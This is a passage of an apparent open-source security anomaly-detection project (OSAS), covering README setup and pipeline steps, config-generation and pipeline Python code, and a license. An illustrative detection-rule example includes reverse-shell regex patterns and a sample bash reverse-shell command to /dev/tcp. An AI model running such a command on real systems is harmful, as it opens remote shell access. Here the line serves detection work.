33 | docker run -p 8888:8888/tcp -p 5601:5601/tcp -v <absolute path to data folder>:/app osas
34 | ```
35 |
36 | **IMPORTANT NOTE:** Please modify the above command by adding the absolute path to your data folder in the appropriate location
37 |
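For example, assuming your datasets live in `/home/user/osas-data` and the image is tagged `osas` (both purely illustrative), the filled-in command would look like this:

```shell
docker run -p 8888:8888/tcp -p 5601:5601/tcp -v /home/user/osas-data:/app osas
```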
38 | After OSAS has started (it might take 1-2 minutes) you can use your browser to access some standard endpoints:
39 | * [http://localhost:5601/app/home#/](http://localhost:5601/app/home#/) - access to Kibana frontend (this is where you will see your data)
40 | * [http://localhost:8888/?token=osas](http://localhost:8888/?token=osas) - access to Jupyter Lab (open Terminal or create a Notebook)
41 |
42 | For Debug (in case you need to):
43 |
44 | ```shell
45 | docker run -p 8888:8888/tcp -p 5601:5601/tcp -v :/app -ti osas /bin/bash
46 | ```
47 |
48 | ## Building the test pipeline
49 |
50 | This guide will take you through all the necessary steps to configure, train and run your own pipeline on your own dataset.
51 |
52 | **Prerequisite**: Add your own CSV dataset into your data-folder (the one provided in the `docker run` command)
53 |
54 | Once you have started your docker image, use the [OSAS console](http://localhost:8888/osas/console) to gain CLI access to all the tools.
55 |
56 | In what follows, we assume that your dataset is called `dataset.csv`. Please update the commands as necessary in case you use a different name/location.
57 |
58 | **Be sure you are running scripts in the root folder of OSAS:**
59 |
60 | ```bash
61 | cd /osas
62 | ```
63 | **Step 1:** Build a custom pipeline configuration file - this can be done fully manually or by bootstrapping it using our conf autogenerator script:
64 | ```bash
65 | python3 osas/main/autoconfig.py --input-file=/app/dataset.csv --output-file=/app/dataset.conf
66 | ```
67 |
68 | The above command will generate a custom configuration file for your dataset. It will try to guess field types and optimal combinations between fields. You can edit the generated file (which should be available in the shared data-folder) using your favourite editor.
69 |
70 | Standard templates for label generator types are:
71 |
72 | ```editorconfig
73 | [LG_MULTINOMIAL]
74 | generator_type = MultinomialField
75 | field_name =
76 | absolute_threshold = 10
77 | relative_threshold = 0.1
78 | group_by = None # this is an optional field - it can be a single attribute name or a list of names
79 |
80 | [LG_TEXT]
81 | generator_type = TextField
82 | field_name =
83 | lm_mode = char
84 | ngram_range = (3, 5)
85 |
86 | [LG_NUMERIC]
87 | generator_type = NumericField
88 | field_name =
89 | group_by = None # this is an optional field - it can be a single attribute name or a list of names
90 |
91 | [LG_MULTINOMIAL_COMBINER]
92 | generator_type = MultinomialFieldCombiner
93 | field_names = ['', '', ...]
94 | absolute_threshold = 10
95 | relative_threshold = 0.1
96 | group_by = None # this is an optional field - it can be a single attribute name or a list of names
97 |
98 | [LG_KEYWORD]
99 | generator_type = KeywordBased
100 | field_name =
101 | keyword_list = ['', '', '', ...]
102 |
103 | [LG_REGEX]
104 | generator_type = KnowledgeBased
105 | field_name =
106 | rules_and_labels_tuple_list = [('',''), ('',''), ...]
107 | ```
108 |
109 | You can use the above templates to add as many label generators as you want. Just make sure that the header IDs are unique in the configuration file.
110 |
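For illustration only, here is what a small filled-in configuration might look like for a hypothetical dataset with `username`, `source_ip` and `command` columns (the field names are made up; the `[AnomalyScoring]` section mirrors what the autoconfig script emits):

```editorconfig
[LG_USER_IP]
generator_type = MultinomialFieldCombiner
field_names = ['username', 'source_ip']
absolute_threshold = 10
relative_threshold = 0.1

[LG_COMMAND_TEXT]
generator_type = TextField
field_name = command
lm_mode = char
ngram_range = (3, 5)

[AnomalyScoring]
scoring_algorithm = StatisticalNGramAnomaly
```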
111 | **Step 2:** Train the pipeline
112 |
113 | ```bash
114 | python3 osas/main/train_pipeline.py --conf-file=/app/dataset.conf --input-file=/app/dataset.csv --model-file=/app/dataset.json
115 | ```
116 |
117 | The above command will generate a pretrained pipeline using the previously created configuration file and the dataset.
118 |
119 | **Step 3:** Run the pipeline on a dataset
120 |
121 | ```bash
122 | python3 osas/main/run_pipeline.py --conf-file=/app/dataset.conf --model-file=/app/dataset.json --input-file=/app/dataset.csv --output-file=/app/dataset-out.csv
123 | ```
124 |
125 | The above command will run the pretrained pipeline on any compatible dataset. In the example we run the pipeline on the training data, but you can use previously unseen data. It will generate an output file with labels and anomaly scores, and it will also import your data into Elasticsearch/Kibana. To view the results, just use the [web interface](http://localhost:5601/app/dashboards).
126 |
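If you want a quick look at the scored output outside of Kibana, a short snippet along these lines works (a sketch only; it assumes `pandas` is available and that the output keeps the default `labels` and `score` column names):

```python
import pandas as pd

# Load the CSV produced by run_pipeline.py and list the most anomalous rows first.
df = pd.read_csv('/app/dataset-out.csv')
print(df.sort_values('score', ascending=False)[['labels', 'score']].head(10))
```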
127 | # Developing models
128 |
129 | Now that everything is up and running, we prepared a set of development guidelines that will help you apply OSAS on your own dataset:
130 |
131 | 1. [Pipeline configuration](docs/PIPELINE_CONFIGURATION.md): This will help you understand how the label generators and anomaly scoring works in OSAS;
132 | 2. [Rule-based score modifiers and labeling](docs/RULES.md): Once you have a working OSAS pipeline, you can further refine your results by adding new labels and modifying the anomaly scoring based on static rules (a minimal rule sketch follows this list).
133 |
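To give a feel for the rule mechanism, below is a minimal sketch of a rule as it looks after being loaded from YAML (the keys `rule name`, `rule label`, `rule score` and `conditions` are what the rule loader expects; the field names and regular expressions are purely illustrative), together with the matching logic the rule engine applies:

```python
import re

# Sketch of a parsed rule: every attribute inside a condition block must match
# (any regex in a list counts); if one block matches, the rule fires and its
# label and score are applied to the row.
rule = {
    'rule name': 'suspicious shell',
    'rule label': 'SUSPICIOUS_SHELL',
    'rule score': 5.0,
    'conditions': {
        'interactive reverse shell': {
            'command': ['.*bash -i.*', '.*nc .* -e .*'],
            'username': 'www-data',
        }
    },
}


def rule_matches(rule: dict, row: dict) -> bool:
    for condition in rule['conditions'].values():
        if all(
            any(re.match(pattern, row[field])
                for pattern in (values if isinstance(values, list) else [values]))
            for field, values in condition.items()
        ):
            return True
    return False


row = {'command': 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1', 'username': 'www-data'}
print(rule_matches(rule, row))  # prints: True
```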
134 | # Citing and attribution
135 |
136 | **Full-text-paper: [A Principled Approach to Enriching Security-related Data for Running Processes through Statistics and Natural Language Processing](https://www.scitepress.org/Papers/2021/103814/103814.pdf).**
137 |
138 | If you want to use this repository in any academic work, please cite the following work:
139 |
140 | **MLA**
141 | * Boros, Tiberiu, et al. ‘A Principled Approach to Enriching Security-Related Data for Running Processes through Statistics and Natural Language Processing’. IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security, 2021.
142 |
143 | **APA**
144 | * Boros, T., Cotaie, A., Vikramjeet, K., Malik, V., Park, L., & Pachis, N. (2021). A principled approach to enriching security-related data for running processes through statistics and natural language processing. IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security.
145 |
146 | **Chicago**
147 | * Boros, Tiberiu, Andrei Cotaie, Kumar Vikramjeet, Vivek Malik, Lauren Park, and Nick Pachis. ‘A Principled Approach to Enriching Security-Related Data for Running Processes through Statistics and Natural Language Processing’. In IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security, 2021.
148 |
149 | **BibTeX**
150 |
151 | ```text
152 | @article{boros2021principled,
153 | title={A Principled Approach to Enriching Security-related Data for Running Processes through Statistics and Natural Language Processing},
154 | author={Boros, Tiberiu and Cotaie, Andrei and Vikramjeet, Kumar and Malik, Vivek and Park, Lauren and Pachis, Nick},
155 | year={2021},
156 | booktitle={IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security}
157 | }
158 | ```
--------------------------------------------------------------------------------
/src/osas/main/autoconfig.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import optparse
20 | import sys
21 | import inspect
22 |
23 | sys.path.append('')
24 | from osas.data.datasources import CSVDataSource
25 | from osas.core import label_generators
26 |
27 |
28 | def _get_type(val):
29 | try:
30 | x = int(val)
31 | return 'int'
32 | except:
33 | try:
34 | x = float(val)
35 | return 'float'
36 | except:
37 | if val is None:
38 | return 'none'
39 | else:
40 | return 'str'
41 |
42 |
43 | def _detect_field_type(datasource, count_column=None):
44 | item = datasource[0]
45 | field_type = {key: 'int' for key in item}
46 | sys.stdout.write('\n')
47 | sys.stdout.flush()
48 |
49 | if count_column is None:
50 | count = len(datasource)
51 | else:
52 | count = 0
53 |
54 | for item in datasource:
55 | if count_column is not None:
56 | count += item[count_column]
57 | for key in item:
58 | t = _get_type(item[key])
59 | if t == 'float':
60 | if field_type[key] == 'int':
61 | field_type[key] = t
62 | elif t == 'str':
63 | field_type[key] = t
64 |
65 | field2val = {}
66 | for item in datasource:
67 | for key in field_type:
68 | if field_type[key] == 'str' or field_type[key] == 'int' or field_type[key] == 'float':
69 | value = item[key]
70 | if key not in field2val:
71 | field2val[key] = {}
72 | if (len(field2val[key]) - 1) / count < 0.1:
73 | if value not in field2val[key]:
74 | field2val[key][value] = '1'
75 | for key in field2val:
76 | if len(field2val[key]) / count < 0.1:
77 | field_type[key] = 'multinomial'
78 | elif field_type[key] == 'str':
79 | field_type[key] = 'text'
80 |
81 | return field_type
82 |
83 |
84 | def _get_generators(datasource: CSVDataSource, field_types: dict):
85 | generator_list = []
86 | for key in field_types:
87 | if field_types[key] == 'int' or field_types[key] == 'float':
88 | generator_list.append(['NumericField', [key]])
89 | if field_types[key] == 'multinomial':
90 | generator_list.append(['MultinomialField', [key]])
91 | if field_types[key] == 'text':
92 | generator_list.append(['TextField', [key]])
93 | assigned = {}
94 | for key1 in field_types:
95 | for key2 in field_types:
96 | if field_types[key1] == 'multinomial' and field_types[key2] == 'multinomial' and \
97 | (key2, key1) not in assigned and key1 != key2:
98 | generator_list.append(['MultinomialFieldCombiner', [key1, key2]])
99 | assigned[(key1, key2)] = '1'
100 |
101 | generator_list = list(sorted(generator_list, key=lambda x: x[0]))
102 |
103 | return generator_list
104 |
105 |
106 | HEADER = """; OSAS autogenerated configuration file
107 | ;
108 | ; Below we provide a list of standard label generator templates - feel free to copy-paste and edit them
109 | ; in order to cope with your own dataset
110 | ;
111 |
112 | ; [LG_MULTINOMIAL]
113 | ; generator_type = MultinomialField
114 | ; field_name =
115 | ; absolute_threshold = 10
116 | ; relative_threshold = 0.1
117 |
118 | ; [LG_TEXT]
119 | ; generator_type = TextField
120 | ; field_name =
121 | ; lm_mode = char
122 | ; ngram_range = (3, 5)
123 |
124 | ; [LG_NUMERIC]
125 | ; generator_type = NumericField
126 | ; field_name =
127 | ; label_for_normal = False
128 | ; stdev = True
129 | ; stdev_borderline_threshold = 1
130 | ; stdev_outlier_threshold = 2
131 | ; spike = none # one of 'none', 'ratio', or 'fixed'
132 | ; spike_borderline_threshold = 10
133 | ; spike_outlier_threshold = 20
134 |
135 | ; [LG_MULTINOMIAL_COMBINER]
136 | ; generator_type = MultinomialFieldCombiner
137 | ; field_names = ['', '', ...]
138 | ; absolute_threshold = 10
139 | ; relative_threshold = 0.1
140 |
141 | ; [LG_KEYWORD]
142 | ; generator_type = KeywordBased
143 | ; field_name =
144 | ; keyword_list = ['', '', '', ...]
145 |
146 | ; [LG_REGEX]
147 | ; generator_type = KnowledgeBased
148 | ; field_name =
149 | ; rules_and_labels_tuple_list = [('',''), ('',''), ...]"""
150 |
151 |
152 | def _write_conf(generators, filename, count_column=None):
153 | f = open(filename, 'w')
154 | f.write(HEADER)
155 | f.write('\n\n')
156 |     if count_column:
157 | f.write('[GENERAL]\n')
158 | f.write('count_column={0}\n\n'.format(count_column))
159 | count = 0
160 | for generator in generators:
161 | count += 1
162 | f.write('[LG_{0}]\n'.format(count))
163 | f.write('generator_type = {0}\n'.format(generator[0]))
164 | dyn_class = getattr(sys.modules[label_generators.__name__], generator[0])
165 |
166 | signature = inspect.signature(dyn_class.__init__)
167 | for param in signature.parameters.items():
168 | param_name = param[1].name
169 | param_value = param[1].default
170 | if param_name == 'self':
171 | continue
172 | if param_name == 'field_name' or param_name == 'field_names':
173 | if len(generator[1]) == 1:
174 | param_value = generator[1][0]
175 | else:
176 | param_value = generator[1]
177 | f.write('{0} = {1}\n'.format(param_name, param_value))
178 | f.write('\n')
179 | f.write('[AnomalyScoring]\nscoring_algorithm = StatisticalNGramAnomaly\n')
180 | f.close()
181 |
182 |
183 | def process(params):
184 | datasource = CSVDataSource(params.input_file)
185 | sys.stdout.write('Preprocessing')
186 | if params.count_column:
187 | cc = params.count_column
188 | else:
189 | cc = None
190 | field_type = _detect_field_type(datasource, count_column=cc)
191 | sys.stdout.write('\t::Detected field types:\n')
192 | for key in field_type:
193 | sys.stdout.write('\t\t"{0}": {1}\n'.format(key, field_type[key]))
194 |
195 | generators = _get_generators(datasource, field_type)
196 | sys.stdout.write('\t::Suggested generators:\n')
197 | for item in generators:
198 | sys.stdout.write('\t\t{0}: {1}\n'.format(item[0], item[1]))
199 |
200 | _write_conf(generators, params.output_file, count_column=params.count_column)
201 |
202 |
203 | if __name__ == '__main__':
204 | parser = optparse.OptionParser()
205 | parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
206 | parser.add_option('--output-file', action='store', dest='output_file', help='location of the output file')
207 | parser.add_option('--count-column', action='store', dest='count_column',
208 |                       help='if this value is set, OSAS will consider the data clustered and this column will indicate '
209 | 'the number of occurrences of the event. Otherwise, this number is considered equal to 1')
210 | (params, _) = parser.parse_args(sys.argv)
211 |
212 | if params.input_file and params.output_file:
213 | process(params)
214 | else:
215 | parser.print_help()
216 |
--------------------------------------------------------------------------------
/src/osas/pipeline/pipeline.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import configparser
20 | import os
21 | import sys
22 | from ast import literal_eval
23 |
24 | sys.path.append('')
25 | from src.osas.pipeline import GroomData
26 | from osas.data.datasources import CSVDataSource, Datasource
27 | from src.osas.pipeline import DetectAnomalies
28 | import json
29 |
30 |
31 | class Pipeline:
32 | ''' base class contains all template methods '''
33 | env = None
34 | root_dir = None
35 | config = None
36 |
37 | def __init__(self, env):
38 | '''
39 | init args
40 | - obj
41 | - env var
42 | '''
43 | # global vars set as env vars
44 | Pipeline.env = env
45 | os.environ["OSAS_ENV"] = env # PROD/STAGE/DEV
46 | curr_dir = os.path.dirname(os.path.realpath(__file__))
47 | Pipeline.root_dir = os.path.realpath(os.path.join(curr_dir, "../"))
48 | self._pipeline = []
49 | self._detect_anomalies = None
50 | self._count_column = None
51 |
52 | def load_config(self, config_file, env='DEV'):
53 | '''
54 | load configs
55 | args:
56 | - obj
57 | - configfile path
58 | - env
59 | '''
60 | with open(config_file, "r") as f:
61 | cfg = configparser.RawConfigParser()
62 | cfg.read_file(f)
63 | self.config = cfg
64 |
65 | self._scoring_model_name = self.config['AnomalyScoring']['scoring_algorithm']
66 |
67 | if 'GENERAL' in self.config:
68 | if 'count_column' in self.config['GENERAL']:
69 | self._count_column = self.config['GENERAL']['count_column']
70 |
71 | def load_model(self, model_file, env='DEV'):
72 | '''
73 | Loads a pretrained model for the current configuration
74 | :param model_file: json file where pretrained model was stored
75 | :param env: environment type
76 | :return: None
77 | '''
78 | pretrained = json.load(open(model_file))
79 | gd = GroomData()
80 | self._pipeline = []
81 | for sect in self.config:
82 | print('\t::{0}'.format(sect))
83 | if 'generator_type' in self.config[sect]:
84 | self._pipeline.append(gd.from_pretrained(self.config[sect]['generator_type'],
85 | pretrained['model'][sect]))
86 | da = DetectAnomalies()
87 | self._detect_anomalies = da.get_pretrained_model(self._scoring_model_name, json.dumps(pretrained['scoring']))
88 |
89 | def build_pipeline(self, dataset: Datasource, incremental=False) -> dict:
90 | '''
91 | Generates a JSON serializable object that contains data for all pretrained label generators
92 | :param dataset: dataset to train the model on
93 | :return: serializable dict object
94 | '''
95 | gd = GroomData()
96 | ex_pipeline = self._pipeline
97 | self._pipeline = []
98 | final_model = {'model': {}}
99 | index = 0
100 | for sect in self.config:
101 | print('\t::{0}'.format(sect))
102 | if 'generator_type' in self.config[sect]:
103 | for key in self.config[sect]:
104 | print("\t\t::{0} = {1}".format(key, self.config[sect][key]))
105 | if incremental:
106 | lg = ex_pipeline[index]
107 | else:
108 | lg = gd.label_generator(self.config[sect]['generator_type'], self.config[sect])
109 | index += 1
110 | print("\t\t::OBJECT: {0}".format(lg))
111 | sys.stdout.write('\t\t::BUILDING MODEL...')
112 | sys.stdout.flush()
113 | lg_model = gd.build_model(lg, dataset, count_column=self._count_column)
114 | final_model['model'][sect] = lg_model
115 | sys.stdout.write('done\n')
116 | self._pipeline.append(lg)
117 | # remove anomaly detection update (not all models support incremental because of sklearn dependencies)
118 | # if incremental:
119 | # final_model['scoring'] = self._detect_anomalies
120 | # return final_model
121 |
122 | self(dataset, dest_field_labels='_labels')
123 | da = DetectAnomalies()
124 | if not incremental:
125 | self._detect_anomalies = da.detection_model(self.config['AnomalyScoring']['scoring_algorithm'],
126 | load_config=False)
127 |         # check for classifier scoring and, if so, add ground truth column and classifier as param
128 | if self.config['AnomalyScoring']['scoring_algorithm'] == 'SupervisedClassifierAnomaly':
129 | ground_truth_column = self.config['AnomalyScoring']['ground_truth_column']
130 | classifier = self.config['AnomalyScoring']['classifier']
131 | # grab function args for model init from rest of conf variables
132 | init_args = dict(self.config['AnomalyScoring'])
133 | del init_args['scoring_algorithm']
134 | del init_args['ground_truth_column']
135 | del init_args['classifier']
136 | # convert config values to inferred types, safely
137 | for k in init_args:
138 | try:
139 | init_args[k] = literal_eval(init_args[k])
140 | except:
141 | # it will be a string otherwise
142 | pass
143 | # build model
144 | scoring_model = self._detect_anomalies.build_model(dataset,
145 | ground_truth_column,
146 | classifier,
147 | init_args,
148 | incremental=incremental)
149 | else:
150 | scoring_model = self._detect_anomalies.build_model(dataset, incremental=incremental)
151 | final_model['scoring'] = scoring_model
152 | return final_model
153 |
154 | def __call__(self, dataset: Datasource, dest_field_labels='labels', dest_field_score='score'):
155 | all_labels = []
156 | for item in dataset:
157 | label_list = []
158 | for lg in self._pipeline:
159 | llist = lg(item)
160 | for label in llist:
161 | label_list.append(label)
162 | all_labels.append(label_list)
163 | dataset[dest_field_labels] = all_labels
164 | dataset['_labels'] = all_labels
165 | if self._detect_anomalies is not None:
166 | scores = self._detect_anomalies(dataset)
167 | dataset[dest_field_score] = scores
168 |
169 |
170 | if __name__ == '__main__':
171 | p = Pipeline('DEV')
172 | p.load_config('tests/pipeline_test.conf')
173 | import time
174 |
175 | ts1 = time.time()
176 | datasource = CSVDataSource('tests/test_small.csv')
177 | ts2 = time.time()
178 | pipeline_model = p.build_pipeline(datasource)
179 | ts3 = time.time()
180 | p(datasource)
181 | ts4 = time.time()
182 | json.dump(pipeline_model, open('tests/pipeline.json', 'w'), indent=4)
183 | for item in datasource[:10]:
184 | print(item)
185 | print()
186 | print()
187 |
188 | print(
189 | "Timing:\n\tLoad dataset: {0}\n\tBuild pipeline: {1}\n\tApply models:{2}\n\tDataset size: {3} entries\n".format(
190 | ts2 - ts1, ts3 - ts2, ts4 - ts3, len(datasource)))
191 |
192 | # load
193 | p = Pipeline('DEV')
194 | p.load_config('tests/pipeline_test.conf')
195 | p.load_model('tests/pipeline.json')
196 | p(datasource)
197 |
198 | for item in datasource[:10]:
199 | print(item)
200 | print()
201 | print()
202 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "{}"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright {yyyy} {name of copyright owner}
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/src/osas/webserver.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | from flask import Flask
20 | from flask import Response
21 | from flask import request
22 | from flask import render_template, send_from_directory, send_file
23 | from os import listdir
24 | from os.path import isfile, join
25 | import subprocess
26 | import configparser
27 | import pty
28 | import os
29 | import threading
30 | import shlex
31 | import select
32 | import struct
33 | import termios
34 | import fcntl
35 |
36 | if os.path.isdir('/app'):
37 |     data_path = '/app/'
38 | else:
39 | data_path = 'tests/'
40 |
41 | app = Flask(__name__)
42 | pty_buffer = []
43 |
44 |
45 | @app.route('/', defaults={'path': ''})
46 | @app.route('/osas')
47 | def index():
48 | text = ''' OSAS server is running
49 | For console interaction, go to http://127.0.0.1:8888/osas/console and follow the steps
50 | For automated pipeline, go to http://127.0.0.1:8888/osas/run_full_process
51 | For custom pipeline, go to http://127.0.0.1:8888/osas/generate_config and follow the steps
